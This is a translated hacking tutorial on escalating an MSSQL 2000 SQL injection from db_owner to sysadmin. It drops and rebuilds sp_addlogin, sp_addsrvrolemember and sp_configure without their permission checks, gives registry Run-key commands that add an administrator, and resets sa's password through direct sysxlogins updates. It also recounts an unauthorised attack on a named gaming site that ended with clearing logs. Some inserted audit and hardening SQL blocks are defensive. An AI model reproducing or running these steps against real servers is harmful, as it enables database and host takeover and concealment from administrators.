----
Just give me an injection point, no matter what permissions, and I will give you a WebShell or even system privileges.
Original: Xu Wenqiang (XWQ), QQ: 57133683
Disclaimer: This article is for teaching purposes only, and I take no responsibility for the consequences of attacks based on it. Because it turned out to be too harmful, the original text has been cut down and modified. Even this version is still very damaging, so please do not perform any destructive operations against domestic sites.
After thinking it over three times I still decided to publish it. This trick is poisonous and its range is wide: it can be said that as long as a site has a SQL injection vulnerability, this method will get you a WebShell or even system privileges 99% of the time (I dare not say more, heh; I have hundreds of real "practice runs" behind me, and basically 100% of them got a WebShell or even system privileges).
I remember that in "MSSQL DB_OWNER role injection straight to system privileges (continued)" I wrote about a method of getting system privileges with xp_regwrite:
xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'XWQ1', 'REG_SZ', 'net user xwq xwq /add'
xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'XWQ2', 'REG_SZ', 'net localgroup administrators xwq /add'
As soon as the web server restarts you get system privileges. After hundreds of real experiments, though, this method is not very practical: it easily attracts the attention of the network administrator, and forcing a restart with a DDoS is itself a violation (even for "good people") and costs a lot of manpower and resources (depending on how many bots ("broilers") you have). So it is not feasible (unless you really want that particular site).
Oh, so much talk; you may be getting impatient. Good. Now I introduce one of my three killer techniques --- universal privilege escalation (万能提权).
If a website has a SQL injection vulnerability and the site connects with a login in the sysadmin fixed server role (heh, popularly speaking: sa; beginners can think of it that way), then getting a WebShell or system privileges is an easy thing. As far as I know there are about 10 ways to get a WebShell or system privileges with sysadmin rights, heh, maybe more (and at least 10). How to get a WebShell or system privileges that way I don't want to say more about; I think everyone knows it well. But what if the site's login only has db_owner permission? What do you do then? How do you escalate, how do you get a WebShell (without an upload vulnerability or a database backup)? Everyone may think of backing up a shell, but I remember LCX also said in "MSSQL DB_OWNER role injection straight to system privileges" that "backing up a shell is just theory; if a WebShell comes out at 20MB, can you use it?". Oh, and if I tell you that with db_owner the method of getting a WebShell or system privileges is the same as with sysadmin, what would you say? Is it a bit incredible, or is it just me? (Friends who don't believe me, don't read the content below.)
Oh, is it itching? Can't wait to know? I'll stop talking. Here I tell everyone about one of my three killer techniques ---- the universal privilege escalation method (万能提权方法).
Before explaining it, let's do an experiment first.
Experimental environment: Windows XP SP1, SQL Server 2000 SP3. Everyone follow me step by step. First create a new login with db_owner permission; here I named it XWQ (select nothing under server roles; tick db_owner under database roles). OK, now open Query Analyzer, connect as XWQ, and enter sp_addlogin xuwenqiang. Run it. What comes back?
Server: Msg 2571, Level 14, State 2, Procedure sp_addlogin, Line 16
User 'XWQ' does not have permission to run DBCC AUDITEVENT.
Server: Msg 15247, Level 16, State 1, Procedure sp_addlogin, Line 17
User does not have permission to perform this action.
Oh, the error messages above are normal, because only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin. So how can I make sp_addlogin usable for me? Let's take a look at the code of sp_addlogin:
create procedure sp_addlogin
    @loginame       sysname
    ,@passwd        sysname = NULL
    ,@defdb         sysname = 'master'      -- UNDONE: DEFAULT CONFIGURABLE???
    ,@deflanguage   sysname = NULL
    ,@sid           varbinary(16) = NULL
    ,@encryptopt    varchar(20) = NULL
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret int    -- return value of sp call

    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
    begin
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
    end

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT LOGIN ONLY)
    --  (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end

    -- Note: Different case sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- VALIDATE DEFAULT DATABASE --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- VALIDATE DEFAULT LANGUAGE --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid     -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- VALIDATE SID IF GIVEN --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2     -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,     -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
    insert into master.dbo.sysxlogins values
        (NULL, @sid, @xstatus, getdate(),
         getdate(), @loginame, convert(varbinary(256), @passwd),
         db_id(@defdb), @deflanguage)
    if @@error <> 0     -- this indicates we caught duplicate row
        return (1)

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0)  -- sp_addlogin
go
The reason only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin is mainly this passage, which does the trick:
    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
    begin
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
    end
As long as we delete this code, a user with any permission can add logins.
OK, let's first drop sp_addlogin:
drop procedure sp_addlogin
Then recreate sp_addlogin:
create procedure sp_addlogin
    @loginame       sysname
    ,@passwd        sysname = NULL
    ,@defdb         sysname = 'master'      -- UNDONE: DEFAULT CONFIGURABLE???
    ,@deflanguage   sysname = NULL
    ,@sid           varbinary(16) = NULL
    ,@encryptopt    varchar(20) = NULL
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret int    -- return value of sp call

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT LOGIN ONLY)
    --  (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end

    -- Note: Different case sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- VALIDATE DEFAULT DATABASE --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- VALIDATE DEFAULT LANGUAGE --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid     -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- VALIDATE SID IF GIVEN --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2     -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,     -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
    insert into master.dbo.sysxlogins values
        (NULL, @sid, @xstatus, getdate(),
         getdate(), @loginame, convert(varbinary(256), @passwd),
         db_id(@defdb), @deflanguage)
    if @@error <> 0     -- this indicates we caught duplicate row
        return (1)

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0)  -- sp_addlogin
go
So now I can add logins. OK, in Query Analyzer enter sp_addlogin xuwenqiang and run it. Good! It returns "New login created."
I have created a login xuwenqiang, but of course I don't do this for nothing; I have to turn it into a user with the highest permission, which in SQL Server is of course sysadmin. The only way to make a login sysadmin is the stored procedure sp_addsrvrolemember, and only sysadmin users can use it. Annoying, but I will still make it work for me, heh. Smart readers must already have thought of how: I only have db_owner permission, so how do I use sp_addsrvrolemember? Yes, the same way as with sp_addlogin: as long as we modify sp_addsrvrolemember a little, we can add sysadmin. Let's take a look at the code of sp_addsrvrolemember:
create procedure sp_addsrvrolemember
    @loginame   sysname,        -- login name
    @rolename   sysname = NULL  -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret        int,    -- return value of sp call
            @rolebit    smallint,
            @ismem      int

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end

    -- AUDIT A SUCCESSFUL SECURITY CHECK --
    dbcc auditevent (108, 1, 1, @loginame, NULL, @rolename, NULL)

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = case @rolename
            when 'sysadmin'         then 16
            when 'securityadmin'    then 32
            when 'serveradmin'      then 64
            when 'setupadmin'       then 128
            when 'processadmin'     then 256
            when 'diskadmin'        then 512
            when 'dbcreator'        then 1024
            when 'bulkadmin'        then 4096
            else NULL end

    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')
    raiserror(15488,-1,-1,@loginame,@rolename)

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    return (@@error)    -- sp_addsrvrolemember
go
Remove this paragraph:
    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end
In this way we can add sysadmin at will. Heh, cool. In Query Analyzer enter sp_addsrvrolemember xuwenqiang, sysadmin. Yeah!!!!!!!! Success. Here we have successfully used a login with only db_owner permission to create a login with the highest permission in SQL Server, that is, the login xuwenqiang with sysadmin permission. With sysadmin permission, is a WebShell or system privilege not easy to get! And don't fix your eyes only on the two stored procedures I talked about, sp_addlogin and sp_addsrvrolemember: any stored procedure that only sysadmin can use can be used with my universal privilege escalation trick, for example sp_configure, sp_addlinkedserver, sp_addlinkedsrvlogin, sp_makewebtask, etc. We can make them work for us with less than sysadmin permission.
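As an added example, not part of the original article, the following T-SQL audit query, written for the SQL Server 2000 system tables the article uses, looks for the trace this technique leaves behind: a system procedure in master whose crdate no longer matches the date shared by the rest of the shipped procedures, whose definition no longer mentions is_srvrolemember, or whose text has been encrypted. The procedure names are those the article lists; the expectation that each of them normally contains an is_srvrolemember check is an assumption to confirm against a clean install of the same build.

```sql
-- Added audit query (not from the original article): find system stored
-- procedures in master that have been dropped and recreated, or whose
-- definition no longer carries the is_srvrolemember() permission check.
-- Assumes SQL Server 2000 system tables (sysobjects, syscomments).
use master
go
select o.name,
       o.crdate,
       -- Shipped procedures all share the install/service-pack date, so a
       -- procedure whose crdate is shared by nobody else was recreated later.
       peers_with_same_crdate =
            (select count(*) from master.dbo.sysobjects p
              where p.xtype = 'P' and p.crdate = o.crdate),
       -- The definition is stored in 4000-character chunks; each chunk is
       -- checked, so a token split exactly on a chunk boundary would be missed.
       has_perm_check = case when exists
            (select * from master.dbo.syscomments c
              where c.id = o.id and c.text like '%is_srvrolemember%')
            then 1 else 0 end,
       -- WITH ENCRYPTION on a system procedure is itself suspicious.
       encrypted = case when exists
            (select * from master.dbo.syscomments c
              where c.id = o.id and c.encrypted = 1)
            then 1 else 0 end
from master.dbo.sysobjects o
where o.xtype = 'P'     -- extended procedures (xtype 'X') carry no T-SQL text
  and o.name in ('sp_addlogin', 'sp_addsrvrolemember', 'sp_configure',
                 'sp_addlinkedserver', 'sp_addlinkedsrvlogin', 'sp_makewebtask')
order by o.name
go
```

A row with peers_with_same_crdate = 1, has_perm_check = 0 or encrypted = 1 is the finding; the article's rebuilt sp_addlogin and sp_addsrvrolemember would show all three, since both the permission check and the dbcc auditevent calls are gone from their text.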
Let's take another example of universal privilege escalation:
creating a perfect back door that will never be killed.
We all know there is a login in SQL Server that is called a back door: sa. sa is a built-in administrator login and cannot be changed or deleted. Oh, that is what M$ says; if you have seen another article I wrote, "Completely deleting the sa back door", you know that sa can in fact be deleted. We know that SQL Server has a stored procedure for changing passwords, sp_password, but the user must know the old password to change it. So is there no way to change sa's password without knowing the old one? There is: use sp_configure. The function of sp_configure is to display or change global configuration settings for the current server. Permission to execute sp_configure (to change configuration options) defaults to the sysadmin and serveradmin fixed server roles. This is easy: delete the permission-check segment in sp_configure, rebuild it, and we can use it.
create procedure sp_configure  --- 1996/08/14 09:43
    @configname varchar(35) = NULL   -- option name to configure
    ,@configvalue int = NULL         -- new configuration value
as
    set nocount on
    declare
         @confignum    int   -- num of the opt to be configured
        ,@configcount  int   -- num of options like @configname
        ,@show_advance int   -- Y/N read & write actions on 'advanced' opts
    declare @fullconfigname varchar(35)
    declare @prevvalue int

    /*
    **  Determine @maxnumber based on advance option in syscurconfigs.
    */
    if (select value from master.dbo.syscurconfigs where config = 518) = 1
        select @show_advance = 1    -- display advanced options
    else
        select @show_advance = 0    -- don't display advanced options

    /*
    **  Make certain that max user info. reflects any addpak upgrades.
    */
    if (select high from master.dbo.spt_values where number = 103 and type = 'C')
            <> @@max_connections
        update master.dbo.spt_values
            set high = @@max_connections
            where number = 103
            and type = 'C'

    /*
    **  If no option name is given, the procedure will just print out all the
    **  options and their values.
    */
    if @configname is null
    begin
        select name, minimum = low, maximum = high,
               config_value = c.value,
               run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c,
             master.dbo.syscurconfigs
        where type = 'C'
            and number = c.config
            and number = master.dbo.syscurconfigs.config
            and ((c.status & 2 <> 0 and @show_advance = 1)
                 or (c.status & 2 = 0))
        order by lower(name)
        return (0)
    end

    /*
    **  Use @configname and try to find the right option.
    **  If there isn't just one, print appropriate diagnostics and return.
    */
    select @configcount = count(*), @fullconfigname = min(v.name),
           @prevvalue = min(c.value)
    from master.dbo.spt_values v, master.dbo.sysconfigures c
    where v.name like '%' + @configname + '%' and v.type = 'C'
        and v.number = c.config
        and ((c.status & 2 <> 0 and @show_advance = 1)
             or (c.status & 2 = 0))

    /*
    **  If no option, show the user what the options are.
    */
    if @configcount = 0
    begin
        raiserror(15123,-1,-1,@configname)
        print ''
        raiserror(15456,-1,-1)
        /*
        **  Show the user what the options are.
        */
        select name, minimum = low, maximum = high,
               config_value = c.value,
               run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c,
             master.dbo.syscurconfigs
        where type = 'C'
            and number = c.config
            and number = master.dbo.syscurconfigs.config
            and ((c.status & 2 <> 0 and @show_advance = 1)
                 or (c.status & 2 = 0))
        return (1)
    end

    /*
    **  If more than one option like @configname, show the duplicates and return.
    */
    if @configcount > 1
    begin
        raiserror(15124,-1,-1,@configname)
        print ''
        select duplicate_options = name
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%' and type = 'C'
            and number = c.config
            and ((c.status & 2 <> 0 and @show_advance = 1)
                 or (c.status & 2 = 0))
        return (1)
    end
    else
        /* There must be exactly one, so get the full name. */
        select @configname = name  --, @value_in_sysconfigure = c.value
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%' and type = 'C'
            and number = c.config
            and ((c.status & 2 <> 0 and @show_advance = 1)
                 or (c.status & 2 = 0))

    /*
    **  If @configvalue is null, just show the current state of the option.
    */
    if @configvalue is null
    begin
        select v.name
              ,v.low   as 'minimum'
              ,v.high  as 'maximum'
              ,c.value as 'config_value'
              ,u.value as 'run_value'
        from master.dbo.spt_values v left outer join
             master.dbo.sysconfigures c on v.number = c.config
             left outer join
             master.dbo.syscurconfigs u on v.number = u.config
        where v.type = 'C'
            and v.name like '%' + @configname + '%'
            and ((c.status & 2 <> 0 and @show_advance = 1)
                 or (c.status & 2 = 0))
        return (0)
    end

    /*
    **  Now get the configuration number.
    */
    select @confignum = number
    from master.dbo.spt_values, master.dbo.sysconfigures c
    where type = 'C'
        and (@configvalue between low and high or @configvalue = 0)
        and name like '%' + @configname + '%'
        and number = c.config
        and ((c.status & 2 <> 0 and @show_advance = 1)
             or (c.status & 2 = 0))

    /*
    **  If this is the number of default language, we want to make sure
    **  that the new value is a valid language id in syslanguages.
    */
    if @confignum = 124
    begin
        if not exists (select * from master.dbo.syslanguages
                       where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15127,-1,-1)
                return (1)
            end
        end
    end

    /*
    **  If this is the number of kernel language, we want to make sure
    **  that the new value is a valid language id in syslanguages.
    */
    if @confignum = 132
    begin
        if not exists (select * from master.dbo.syslanguages
                       where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15028,-1,-1)
                return (1)
            end
        end
    end

    /*
    **  "user options" should not try to set incompatible options/values.
    */
    if @confignum = 1534    -- "user options"
    begin
        if (@configvalue & (1024|2048) = (1024|2048))   -- ANSI_NULL_DEFAULT_ON/OFF
        begin
            raiserror(15303,-1,-1,@configvalue)
            return (1)
        end
    end

    /*
    **  Although the @configname is good, @configvalue wasn't in range.
    */
    if @confignum is null
    begin
        raiserror(15129,-1,-1,@configvalue,@configname)
        return (1)
    end

    -- msg 15002, but in 6.5 allow this inside a txn (not check @@trancount)  #12828.

    /*
    **  Now update sysconfigures.
    */
    update master.dbo.sysconfigures set value = @configvalue
        where config = @confignum

    /*
    **  Flush the procedure cache - this is to account for options that become
    **  effective immediately (ie. dont need a server restart).
    */
    dbcc freeproccache

    raiserror(15457,-1,-1,@fullconfigname,@prevvalue,@configvalue) with log
    return (0)  -- sp_configure
go
OK, now we run:
sp_configure 'allow updates', 1
go
reconfigure with override
go
Then it is easy to change sa's password:
update sysxlogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01
This sets sa's password to 111111. Oh, the solution is to delete sa; for how to delete it, see "Completely deleting the sa back door".
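An added audit and clean-up script, not from the original article, for the server state this section describes: whether 'allow updates' is on, which logins carry the sysadmin or securityadmin bits in sysxlogins.xstatus (the bit values are the ones sp_addsrvrolemember uses above), and when sa's row was last changed. It reads syscurconfigs directly because sp_configure itself may have been replaced. SQL Server 2000 system tables are assumed.

```sql
-- Added audit script (not from the original article). Assumes the SQL Server
-- 2000 catalog: spt_values, sysconfigures, syscurconfigs, sysxlogins.
use master
go
-- 1. 'allow updates' must be 0. The running value is read straight from
--    syscurconfigs, not via sp_configure, since that procedure may have been
--    dropped and recreated without its permission check.
select v.name, config_value = c.value, run_value = r.value
from master.dbo.spt_values v
    join master.dbo.sysconfigures c on c.config = v.number
    join master.dbo.syscurconfigs r on r.config = v.number
where v.type = 'C' and v.name = 'allow updates'

-- 2. Who holds server roles? xstatus carries the role bits that
--    sp_addsrvrolemember sets (sysadmin = 16, securityadmin = 32); xdate1 and
--    xdate2 are the creation and last-change stamps written by sp_addlogin and
--    sp_addsrvrolemember. The most recently changed row is listed first.
select name,
       is_sysadmin      = case when xstatus & 16 <> 0 then 1 else 0 end,
       is_securityadmin = case when xstatus & 32 <> 0 then 1 else 0 end,
       created = xdate1, last_changed = xdate2
from master.dbo.sysxlogins
where srvid is null and xstatus & (16|32) <> 0
order by xdate2 desc

-- 3. sa's row. A password set by a direct UPDATE, as shown above, does not
--    touch xdate2, so compare the stored hash against the baseline you keep,
--    not just the date.
select name, created = xdate1, last_changed = xdate2, password_hash = password
from master.dbo.sysxlogins where sid = 0x01

-- 4. Remediation: switch direct catalog updates back off.
exec sp_configure 'allow updates', 0
reconfigure with override
go
```

Any login in the second result that is not in your own list of administrators, or an 'allow updates' run_value of 1, is a finding. Resetting the option does not undo a replaced procedure; the procedures themselves have to be put back from the installation media or service pack, and every password in the third result should be rotated.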
Example:
The following is a privilege escalation test I carried out at one point against a very famous domestic site, roughly verified. For many reasons I will call this site www.**173.com.
www.**173.com is very famous in gaming, ranked in the top 20 (when I tested it). Here I don't want to say how I found the injection point; you can find it yourself, and there are plenty (the whole test really took a lot of time; don't misunderstand, I don't mean time spent on the "testing" but on writing programs along the way: without writing a purpose-built program, how could I get what I wanted? The whole attack itself took less than 10 minutes).
At the found injection point GameType=** (annoyingly, if NBSI2 had existed at the time it would have been much easier), you can first enter Drop Procedure SP_ADDLOGIN, then enter (heh, of course I did it in a program I wrote):
(the same rebuilt sp_addlogin listed above, with the permission check removed)
OK, now we create a login: exec master..sp_addlogin xwq
Then Drop Procedure SP_ADDSRVROLEMEMBER, and enter in IE:
create procedure sp_addsrvrolemember
    @loginame   sysname,        -- login name
    @rolename   sysname = NULL  -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret        int,    -- return value of sp call
            @rolebit    smallint,
            @ismem      int

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = case @rolename
            when 'sysadmin'         then 16
            when 'securityadmin'    then 32
            when 'serveradmin'      then 64
            when 'setupadmin'       then 128
            when 'processadmin'     then 256
            when 'diskadmin'        then 512
            when 'dbcreator'        then 1024
            when 'bulkadmin'        then 4096
            else NULL end

    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')
    raiserror(15488,-1,-1,@loginame,@rolename)

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    return (@@error)    -- sp_addsrvrolemember
go
Then exec master..sp_addsrvrolemember xwq, sysadmin
We connect with a SQL comprehensive exploitation tool or Query Analyzer: heh, success. So we have created a login XWQ with the highest permission on the www.**17173.com server. The rest, I think, everyone already knows. Oh, because this was only a security test I did not go any deeper; I deleted the account, cleared the logs, and left.
So you have seen one of my killer techniques - universal privilege escalation: just give me an injection point, no matter what permissions, and I will give you a WebShell or even system privileges. Oh, in fact calling this escalation method "universal" is a bit exaggerated, because CREATE PROCEDURE permission defaults to members of the sysadmin fixed server role and of the db_owner and db_ddladmin fixed database roles, so when you run into public permission it cannot be used.
But don't think that with public permission there is no way to get a WebShell or system privileges. On the contrary: as far as I know there are at least five ways to get a WebShell or even system privileges with public permission.
The best prevention is to eliminate injection vulnerabilities; that is the cure at the root. (Heh, in my view the best thing would be to grant nothing at all, but there is no permission lower than public, public cannot be removed, and there is no way to stop it from using a lot of dangerous stored procedures. It seems M$ still loves us "bad people" very much.)
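An added hardening example, not from the original article, for the two defender-side points made above: an application login that is mapped into its own database only, with data roles rather than db_owner or db_ddladmin, so it holds no CREATE or DROP PROCEDURE right anywhere and none at all in master; and the site's GameType lookup written so that the value arrives as a parameter instead of being pasted into SQL text. The database, login, table and procedure names (appdb, webapp, games, GetGamesByType) and the password placeholder are constructed for this example; SQL Server 2000 syntax is assumed.

```sql
-- Added hardening example (not from the original article). All names below
-- are constructed for illustration; the password is a placeholder to replace.
use master
go
-- 1. A login whose default database is the application database, not master.
exec sp_addlogin 'webapp', 'PLACEHOLDER-ChangeMe', 'appdb'
go
use appdb
go
-- 2. Map it into appdb only, with the data roles. Neither role grants CREATE
--    or DROP PROCEDURE, and in master this login is at most guest, so the
--    drop-and-recreate trick above has nothing to work with.
exec sp_grantdbaccess 'webapp'
exec sp_addrolemember 'db_datareader', 'webapp'
exec sp_addrolemember 'db_datawriter', 'webapp'
go
-- 3. The lookup as a procedure. The value is bound as a parameter; it is
--    compared as data and can never become part of the statement text.
create procedure dbo.GetGamesByType
    @GameType varchar(50)
as
    set nocount on
    -- What the vulnerable page effectively did, kept here only as a contrast:
    --   exec('select * from games where GameType = ''' + @GameType + '''')
    select GameId, GameName
    from dbo.games
    where GameType = @GameType
go
-- 4. The application login may execute this procedure and nothing else; the
--    web code calls it with a typed parameter rather than a built-up string.
grant execute on dbo.GetGamesByType to webapp
go
```

With this layout an injection attempt in GameType is matched literally against the column and returns nothing, and even a successful injection elsewhere runs as a login that cannot touch master's procedures, so the escalation described in this article stops at db_datareader.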
Postscript
I wrote this article at the beginning of December, from what I studied at school after installing SQL Server in April 2004. After that I never released it, because the harm is too great. I believe some people in China know it; it just was not public. After thinking it over three times I decided to release it. I hope everyone masters it and does not do any destructive operation against domestic sites.
In this article I did not mention how to get a WebShell or system privileges with public permission. As far as I know there are at least five ways to get a WebShell or even system privileges with public permission (at least five; there may be more, and if any master knows more I hope you will enlighten me, thanks in advance).
At an appropriate time I will share the knowledge I have mastered with everyone. Once again: do not damage any legal host in any country, otherwise the consequences are at your own risk.
(Reprinting welcome; please keep the article intact.)
Animation download
http://soft.hackbase.com/view.asp?id=20050219db.zip